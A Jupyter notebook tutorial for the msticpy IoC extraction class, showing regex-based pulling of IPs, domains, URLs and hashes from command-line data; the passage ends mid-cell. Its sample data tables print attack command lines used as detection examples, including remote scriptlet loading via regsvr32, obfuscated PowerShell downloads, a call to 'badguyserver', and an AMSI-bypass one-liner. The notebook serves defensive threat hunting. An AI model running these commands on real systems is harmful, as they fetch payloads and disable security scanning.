{
 "cells": [
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "# Title: msticpy - IoC Extraction\n",
    "## Description:\n",
    "This class allows you to extract IoC patterns from a string or a DataFrame.\n",
    "Several patterns are built in to the class and you can override these or supply new ones.\n",
    "\n",
    "You must have msticpy installed to run this notebook:\n",
    "```\n",
    "%pip install --upgrade msticpy\n",
    "```\n"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "<a id='toc'></a>\n",
    "## Table of Contents\n",
    "- [Looking for IoC in a String](#cmdlineiocs)\n",
    "- [Search DataFrame for IoCs](#dataframeiocs)\n",
    "- [IoCExtractor API](#iocextractapi)\n",
    "  - [Predefined Regex Patterns](#regexpatterns)\n",
    "  - [Adding your own pattern(s)](#addingpatterns)\n",
    "  - [extract() method](#extractmethod)\n",
    "  - [Merge the results with the input DataFrame](#mergeresults)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 17,
   "metadata": {
    "ExecuteTime": {
     "end_time": "2020-02-10T19:52:15.548645Z",
     "start_time": "2020-02-10T19:52:11.878710Z"
    },
    "scrolled": true
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "\n",
       "This product includes GeoLite2 data created by MaxMind, available from\n",
       "<a href=\"https://www.maxmind.com\">https://www.maxmind.com</a>.\n"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "\n",
       "This library uses services provided by ipstack.\n",
       "<a href=\"https://ipstack.com\">https://ipstack.com</a>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    }
   ],
   "source": [
    "# Imports\n",
    "import sys\n",
    "MIN_REQ_PYTHON = (3,6)\n",
    "if sys.version_info < MIN_REQ_PYTHON:\n",
    "    print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')\n",
    "    print('or later is selected as the active kernel.')\n",
    "    sys.exit(\"Python %s.%s or later is required.\\n\" % MIN_REQ_PYTHON)\n",
    "\n",
    "from IPython import get_ipython\n",
    "from IPython.display import display, HTML\n",
    "\n",
    "import matplotlib.pyplot as plt\n",
    "import pandas as pd\n",
    "pd.set_option('display.max_rows', 500)\n",
    "pd.set_option('display.max_columns', 50)\n",
    "pd.set_option('display.max_colwidth', 100)\n",
    "\n",
    "import msticpy\n",
    "msticpy.init_notebook(globals(), verbosity=0);\n"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 9,
   "metadata": {
    "ExecuteTime": {
     "end_time": "2020-02-10T19:52:15.564615Z",
     "start_time": "2020-02-10T19:52:15.549645Z"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<div>\n",
       "<style scoped>\n",
       "    .dataframe tbody tr th:only-of-type {\n",
       "        vertical-align: middle;\n",
       "    }\n",
       "\n",
       "    .dataframe tbody tr th {\n",
       "        vertical-align: top;\n",
       "    }\n",
       "\n",
       "    .dataframe thead th {\n",
       "        text-align: right;\n",
       "    }\n",
       "</style>\n",
       "<table border=\"1\" class=\"dataframe\">\n",
       "  <thead>\n",
       "    <tr style=\"text-align: right;\">\n",
       "      <th></th>\n",
       "      <th>CommandLine</th>\n",
       "    </tr>\n",
       "  </thead>\n",
       "  <tbody>\n",
       "    <tr>\n",
       "      <th>0</th>\n",
       "      <td>.\\ftp  -s:C:\\RECYCLER\\xxppyy.exe</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>1</th>\n",
       "      <td>.\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>2</th>\n",
       "      <td>cmd  /c \"systeminfo &amp;&amp; systeminfo\"</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>3</th>\n",
       "      <td>.\\rundll32  /C 42424.exe</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>4</th>\n",
       "      <td>.\\rundll32  /C c:\\users\\MSTICAdmin\\42424.exe</td>\n",
       "    </tr>\n",
       "  </tbody>\n",
       "</table>\n",
       "</div>"
      ],
      "text/plain": [
       "                                                          CommandLine\n",
       "0                                    .\\ftp  -s:C:\\RECYCLER\\xxppyy.exe\n",
       "1  .\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !\n",
       "2                                  cmd  /c \"systeminfo && systeminfo\"\n",
       "3                                            .\\rundll32  /C 42424.exe\n",
       "4                        .\\rundll32  /C c:\\users\\MSTICAdmin\\42424.exe"
      ]
     },
     "execution_count": 9,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "# Load test data\n",
    "process_tree = pd.read_csv('data/process_tree.csv')\n",
    "process_tree[['CommandLine']].head()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "<a id='cmdlineiocs'></a>[Contents](#toc)\n",
    "## Looking for IoC in a String\n",
    "Here we:\n",
    "- Get a commandline from our data set.\n",
    "- Pass it to the IoC Extractor\n",
    "- View the results"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 10,
   "metadata": {
    "ExecuteTime": {
     "end_time": "2020-02-10T19:52:15.572611Z",
     "start_time": "2020-02-10T19:52:15.566613Z"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "'netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzzzz.txt'"
      ]
     },
     "execution_count": 10,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "# get a commandline from our data set\n",
    "cmdline = process_tree['CommandLine'].loc[78]\n",
    "cmdline"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 11,
   "metadata": {
    "ExecuteTime": {
     "end_time": "2020-02-10T19:52:17.266509Z",
     "start_time": "2020-02-10T19:52:15.573611Z"
    }
   },
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "\n",
      "Potential IoCs found in alert process:\n"
     ]
    },
    {
     "data": {
      "text/plain": [
       "defaultdict(set,\n",
       "            {'ipv4': {'1.2.3.4'},\n",
       "             'windows_path': {'C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzzzz.txt'}})"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    }
   ],
   "source": [
    "# Instantiate an IoCExtract object\n",
    "from msticpy.transform.iocextract import IoCExtract\n",
    "ioc_extractor = IoCExtract()\n",
    "\n",
    "# any IoCs in the string?\n",
    "iocs_found = ioc_extractor.extract(cmdline)\n",
    "    \n",
    "if iocs_found:\n",
    "    print('\\nPotential IoCs found in alert process:')\n",
    "    display(iocs_found)\n"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "<a id='dataframeiocs'></a>[Contents](#toc)\n",
    "## If we have a DataFrame, look for IoCs in the whole data set\n",
    "You can replace the ```data=``` parameter to ioc_extractor.extract() to pass other data frames.\n",
    "Use the ```columns``` parameter to specify which column or columns that you want to search."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 12,
   "metadata": {
    "ExecuteTime": {
     "end_time": "2020-02-10T19:52:17.305487Z",
     "start_time": "2020-02-10T19:52:17.267508Z"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<h3>IoC patterns found in process tree.</h3>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<div>\n",
       "<style scoped>\n",
       "    .dataframe tbody tr th:only-of-type {\n",
       "        vertical-align: middle;\n",
       "    }\n",
       "\n",
       "    .dataframe tbody tr th {\n",
       "        vertical-align: top;\n",
       "    }\n",
       "\n",
       "    .dataframe thead th {\n",
       "        text-align: right;\n",
       "    }\n",
       "</style>\n",
       "<table border=\"1\" class=\"dataframe\">\n",
       "  <thead>\n",
       "    <tr style=\"text-align: right;\">\n",
       "      <th></th>\n",
       "      <th>IoCType</th>\n",
       "      <th>Observable</th>\n",
       "      <th>SourceIndex</th>\n",
       "      <th>Input</th>\n",
       "    </tr>\n",
       "  </thead>\n",
       "  <tbody>\n",
       "    <tr>\n",
       "      <th>0</th>\n",
       "      <td>dns</td>\n",
       "      <td>microsoft.com</td>\n",
       "      <td>24</td>\n",
       "      <td>cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>1</th>\n",
       "      <td>url</td>\n",
       "      <td>http://server/file.sct</td>\n",
       "      <td>31</td>\n",
       "      <td>.\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>2</th>\n",
       "      <td>dns</td>\n",
       "      <td>server</td>\n",
       "      <td>31</td>\n",
       "      <td>.\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>3</th>\n",
       "      <td>dns</td>\n",
       "      <td>evil.ps</td>\n",
       "      <td>35</td>\n",
       "      <td>.\\powershell.exe  -c \"$a = 'Download'+'String'+\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\"...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>4</th>\n",
       "      <td>url</td>\n",
       "      <td>http://somedomain/best-kitten-names-1.jpg'</td>\n",
       "      <td>37</td>\n",
       "      <td>cmd  /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>5</th>\n",
       "      <td>dns</td>\n",
       "      <td>somedomain</td>\n",
       "      <td>37</td>\n",
       "      <td>cmd  /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>6</th>\n",
       "      <td>dns</td>\n",
       "      <td>blah.ps</td>\n",
       "      <td>40</td>\n",
       "      <td>cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa &gt;&gt; blah.ps1\"</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>7</th>\n",
       "      <td>md5_hash</td>\n",
       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
       "      <td>40</td>\n",
       "      <td>cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa &gt;&gt; blah.ps1\"</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>8</th>\n",
       "      <td>dns</td>\n",
       "      <td>blah.ps</td>\n",
       "      <td>41</td>\n",
       "      <td>cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa &gt;&gt; blah.ps1\"</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>9</th>\n",
       "      <td>md5_hash</td>\n",
       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
       "      <td>41</td>\n",
       "      <td>cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa &gt;&gt; blah.ps1\"</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>10</th>\n",
       "      <td>md5_hash</td>\n",
       "      <td>81ed03caf6901e444c72ac67d192fb9c</td>\n",
       "      <td>44</td>\n",
       "      <td>implant.exe  81ed03caf6901e444c72ac67d192fb9c</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>11</th>\n",
       "      <td>url</td>\n",
       "      <td>http://badguyserver/pwnme</td>\n",
       "      <td>46</td>\n",
       "      <td>cmd  /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>12</th>\n",
       "      <td>dns</td>\n",
       "      <td>badguyserver</td>\n",
       "      <td>46</td>\n",
       "      <td>cmd  /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>13</th>\n",
       "      <td>url</td>\n",
       "      <td>http://badguyserver/pwnme</td>\n",
       "      <td>47</td>\n",
       "      <td>.\\powershell  -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>14</th>\n",
       "      <td>dns</td>\n",
       "      <td>badguyserver</td>\n",
       "      <td>47</td>\n",
       "      <td>.\\powershell  -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>15</th>\n",
       "      <td>dns</td>\n",
       "      <td>Invoke-Shellcode.ps</td>\n",
       "      <td>48</td>\n",
       "      <td>.\\powershell  Invoke-Shellcode.ps1</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>16</th>\n",
       "      <td>dns</td>\n",
       "      <td>Invoke-ReverseDnsLookup.ps</td>\n",
       "      <td>49</td>\n",
       "      <td>.\\powershell  Invoke-ReverseDnsLookup.ps1</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>17</th>\n",
       "      <td>dns</td>\n",
       "      <td>Wscript.Shell</td>\n",
       "      <td>67</td>\n",
       "      <td>cmd  /c C:\\Windows\\System32\\mshta.exe vbscript:CreateObject(\"Wscript.Shell\").Run(\".\\powershell.e...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>18</th>\n",
       "      <td>url</td>\n",
       "      <td>http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se...</td>\n",
       "      <td>77</td>\n",
       "      <td>.\\powershell.exe   -command [ref].assembly.gettype('http://system.management.automation.amsiutil...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>19</th>\n",
       "      <td>dns</td>\n",
       "      <td>system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(...</td>\n",
       "      <td>77</td>\n",
       "      <td>.\\powershell.exe   -command [ref].assembly.gettype('http://system.management.automation.amsiutil...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>20</th>\n",
       "      <td>ipv4</td>\n",
       "      <td>1.2.3.4</td>\n",
       "      <td>78</td>\n",
       "      <td>netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\b...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>21</th>\n",
       "      <td>dns</td>\n",
       "      <td>wscript.shell</td>\n",
       "      <td>81</td>\n",
       "      <td>cmd  /c \"powershell wscript.shell used to download a .gif\"</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>22</th>\n",
       "      <td>dns</td>\n",
       "      <td>abc.com</td>\n",
       "      <td>90</td>\n",
       "      <td>c:\\Diagnostics\\UserTmp\\ransomware.exe   @ abc.com abc.wallet</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>23</th>\n",
       "      <td>ipv4</td>\n",
       "      <td>127.0.0.1</td>\n",
       "      <td>102</td>\n",
       "      <td>certutil  -urlcache -split -f http://127.0.0.1/</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>24</th>\n",
       "      <td>url</td>\n",
       "      <td>http://127.0.0.1/</td>\n",
       "      <td>102</td>\n",
       "      <td>certutil  -urlcache -split -f http://127.0.0.1/</td>\n",
       "    </tr>\n",
       "  </tbody>\n",
       "</table>\n",
       "</div>"
      ],
      "text/plain": [
       "     IoCType  \\\n",
       "0        dns   \n",
       "1        url   \n",
       "2        dns   \n",
       "3        dns   \n",
       "4        url   \n",
       "5        dns   \n",
       "6        dns   \n",
       "7   md5_hash   \n",
       "8        dns   \n",
       "9   md5_hash   \n",
       "10  md5_hash   \n",
       "11       url   \n",
       "12       dns   \n",
       "13       url   \n",
       "14       dns   \n",
       "15       dns   \n",
       "16       dns   \n",
       "17       dns   \n",
       "18       url   \n",
       "19       dns   \n",
       "20      ipv4   \n",
       "21       dns   \n",
       "22       dns   \n",
       "23      ipv4   \n",
       "24       url   \n",
       "\n",
       "                                                                                             Observable  \\\n",
       "0                                                                                         microsoft.com   \n",
       "1                                                                                http://server/file.sct   \n",
       "2                                                                                                server   \n",
       "3                                                                                               evil.ps   \n",
       "4                                                            http://somedomain/best-kitten-names-1.jpg'   \n",
       "5                                                                                            somedomain   \n",
       "6                                                                                               blah.ps   \n",
       "7                                                                      aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa   \n",
       "8                                                                                               blah.ps   \n",
       "9                                                                      aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa   \n",
       "10                                                                     81ed03caf6901e444c72ac67d192fb9c   \n",
       "11                                                                            http://badguyserver/pwnme   \n",
       "12                                                                                         badguyserver   \n",
       "13                                                                            http://badguyserver/pwnme   \n",
       "14                                                                                         badguyserver   \n",
       "15                                                                                  Invoke-Shellcode.ps   \n",
       "16                                                                           Invoke-ReverseDnsLookup.ps   \n",
       "17                                                                                        Wscript.Shell   \n",
       "18  http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se...   \n",
       "19  system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(...   \n",
       "20                                                                                              1.2.3.4   \n",
       "21                                                                                        wscript.shell   \n",
       "22                                                                                              abc.com   \n",
       "23                                                                                            127.0.0.1   \n",
       "24                                                                                    http://127.0.0.1/   \n",
       "\n",
       "    SourceIndex  \\\n",
       "0            24   \n",
       "1            31   \n",
       "2            31   \n",
       "3            35   \n",
       "4            37   \n",
       "5            37   \n",
       "6            40   \n",
       "7            40   \n",
       "8            41   \n",
       "9            41   \n",
       "10           44   \n",
       "11           46   \n",
       "12           46   \n",
       "13           47   \n",
       "14           47   \n",
       "15           48   \n",
       "16           49   \n",
       "17           67   \n",
       "18           77   \n",
       "19           77   \n",
       "20           78   \n",
       "21           81   \n",
       "22           90   \n",
       "23          102   \n",
       "24          102   \n",
       "\n",
       "                                                                                                  Input  \n",
       "0   cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft...  \n",
       "1                                            .\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll  \n",
       "2                                            .\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll  \n",
       "3   .\\powershell.exe  -c \"$a = 'Download'+'String'+\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\"...  \n",
       "4   cmd  /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...  \n",
       "5   cmd  /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...  \n",
       "6                                         cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\"  \n",
       "7                                         cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\"  \n",
       "8                                         cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\"  \n",
       "9                                         cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\"  \n",
       "10                                                        implant.exe  81ed03caf6901e444c72ac67d192fb9c  \n",
       "11      cmd  /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"   \n",
       "12      cmd  /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"   \n",
       "13  .\\powershell  -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ...  \n",
       "14  .\\powershell  -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ...  \n",
       "15                                                                   .\\powershell  Invoke-Shellcode.ps1  \n",
       "16                                                            .\\powershell  Invoke-ReverseDnsLookup.ps1  \n",
       "17  cmd  /c C:\\Windows\\System32\\mshta.exe vbscript:CreateObject(\"Wscript.Shell\").Run(\".\\powershell.e...  \n",
       "18  .\\powershell.exe   -command [ref].assembly.gettype('http://system.management.automation.amsiutil...  \n",
       "19  .\\powershell.exe   -command [ref].assembly.gettype('http://system.management.automation.amsiutil...  \n",
       "20  netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\b...  \n",
       "21                                           cmd  /c \"powershell wscript.shell used to download a .gif\"  \n",
       "22                                         c:\\Diagnostics\\UserTmp\\ransomware.exe   @ abc.com abc.wallet  \n",
       "23                                                     certutil  -urlcache -split -f http://127.0.0.1/   \n",
       "24                                                     certutil  -urlcache -split -f http://127.0.0.1/   "
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    }
   ],
   "source": [
    "ioc_extractor = IoCExtract()\n",
    "ioc_df = ioc_extractor.extract(data=process_tree, columns=['CommandLine'])\n",
    "if len(ioc_df):\n",
    "    display(HTML(\"<h3>IoC patterns found in process tree.</h3>\"))\n",
    "    display(ioc_df)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "<a id='iocextractapi'></a>[Contents](#toc)\n",
    "## IoCExtractor API\n"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 13,
   "metadata": {
    "ExecuteTime": {
     "end_time": "2020-02-10T19:52:17.359499Z",
     "start_time": "2020-02-10T19:52:17.306509Z"
    }
   },
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "\u001b[1;31mSignature:\u001b[0m\n",
      "\u001b[0mioc_extractor\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mextract\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m\n",
      "\u001b[0m    \u001b[0msrc\u001b[0m\u001b[1;33m:\u001b[0m \u001b[0mstr\u001b[0m \u001b[1;33m=\u001b[0m \u001b[1;32mNone\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\n",
      "\u001b[0m    \u001b[0mdata\u001b[0m\u001b[1;33m:\u001b[0m \u001b[0mpandas\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mcore\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mframe\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mDataFrame\u001b[0m \u001b[1;33m=\u001b[0m \u001b[1;32mNone\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\n",
      "\u001b[0m    \u001b[0mcolumns\u001b[0m\u001b[1;33m:\u001b[0m \u001b[0mList\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mstr\u001b[0m\u001b[1;33m]\u001b[0m \u001b[1;33m=\u001b[0m \u001b[1;32mNone\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\n",
      "\u001b[0m    \u001b[1;33m**\u001b[0m\u001b[0mkwargs\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\n",
      "\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m->\u001b[0m \u001b[0mUnion\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mDict\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mstr\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mSet\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mstr\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mpandas\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mcore\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mframe\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mDataFrame\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
      "\u001b[1;31mDocstring:\u001b[0m\n",
      "Extract IoCs from either a string or pandas DataFrame.\n",
      "\n",
      "Parameters\n",
      "----------\n",
      "src : str, optional\n",
      "    source string in which to look for IoC patterns\n",
      "    (the default is None)\n",
      "data : pd.DataFrame, optional\n",
      "    input DataFrame from which to read source strings\n",
      "    (the default is None)\n",
      "columns : list, optional\n",
      "    The list of columns to use as source strings,\n",
      "    if the `data` parameter is used. (the default is None)\n",
      "\n",
      "Other Parameters\n",
      "----------------\n",
      "ioc_types : list, optional\n",
      "    Restrict matching to just specified types.\n",
      "    (default is all types)\n",
      "include_paths : bool, optional\n",
      "    Whether to include path matches (which can be noisy)\n",
      "    (the default is false - excludes 'windows_path'\n",
      "    and 'linux_path'). If `ioc_types` is specified\n",
      "    this parameter is ignored.\n",
      "ignore_tlds : bool, optional\n",
      "    If True, ignore the official Top Level Domains\n",
      "    list when determining whether a domain name is\n",
      "    a legal domain.\n",
      "\n",
      "Returns\n",
      "-------\n",
      "Any\n",
      "    dict of found observables (if input is a string) or\n",
      "    DataFrame of observables\n",
      "\n",
      "Notes\n",
      "-----\n",
      "Extract takes either a string or a pandas DataFrame as input.\n",
      "When using the string option as an input extract will\n",
      "return a dictionary of results.\n",
      "When using a DataFrame the results will be returned as a new\n",
      "DataFrame with the following columns:\n",
      "- IoCType: the mnemonic used to distinguish different IoC Types\n",
      "- Observable: the actual value of the observable\n",
      "- SourceIndex: the index of the row in the input DataFrame from\n",
      "which the source for the IoC observable was extracted.\n",
      "\n",
      "IoCType Pattern selection\n",
      "The default list is:  ['ipv4', 'ipv6', 'dns', 'url',\n",
      "'md5_hash', 'sha1_hash', 'sha256_hash'] plus any\n",
      "user-defined types.\n",
      "'windows_path', 'linux_path' are excluded unless `include_paths`\n",
      "is True or explicitly included in `ioc_paths`.\n",
      "\u001b[1;31mFile:\u001b[0m      e:\\src\\msticpy\\msticpy\\transform\\iocextract.py\n",
      "\u001b[1;31mType:\u001b[0m      method\n"
     ]
    }
   ],
   "source": [
    "# IoCExtract docstring\n",
    "ioc_extractor.extract?\n"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "<a id='regexpatterns'></a>[Contents](#toc)\n",
    "### Predefined Regex Patterns"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 14,
   "metadata": {
    "ExecuteTime": {
     "end_time": "2020-02-10T19:52:17.384441Z",
     "start_time": "2020-02-10T19:52:17.361477Z"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<b>ipv4</b>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<div style=\"margin-left:20px\"><pre>(?P&lt;ipaddress&gt;(?:[0-9]{1,3}\\.){3}[0-9]{1,3})</pre></div>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<b>ipv6</b>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<div style=\"margin-left:20px\"><pre>(?&lt;![:.\\w])(?:[A-F0-9]{0,4}:){2,7}[A-F0-9]{0,4}(?![:.\\w])</pre></div>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<b>dns</b>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<div style=\"margin-left:20px\"><pre>((?=[a-z0-9-]{1,63}\\.)[a-z0-9]+(-[a-z0-9]+)*\\.){1,126}[a-z]{2,63}</pre></div>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<b>url</b>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<div style=\"margin-left:20px\"><pre>(?P&lt;protocol&gt;(https?|ftp|telnet|ldap|file)://)\n",
       "            (?P&lt;userinfo&gt;([a-z0-9-._~!$&amp;\\&#x27;()*+,;=:]|%[0-9A-F]{2})*@)?\n",
       "            (?P&lt;host&gt;([a-z0-9-._~!$&amp;\\&#x27;()*+,;=]|%[0-9A-F]{2})*)\n",
       "            (:(?P&lt;port&gt;\\d*))?\n",
       "            (/(?P&lt;path&gt;([^?\\#&quot;&lt;&gt;\\s]|%[0-9A-F]{2})*/?))?\n",
       "            (\\?(?P&lt;query&gt;([a-z0-9-._~!$&amp;&#x27;()*+,;=:/?@]|%[0-9A-F]{2})*))?\n",
       "            (\\#(?P&lt;fragment&gt;([a-z0-9-._~!$&amp;&#x27;()*+,;=:/?@]|%[0-9A-F]{2})*))?</pre></div>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<b>windows_path</b>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
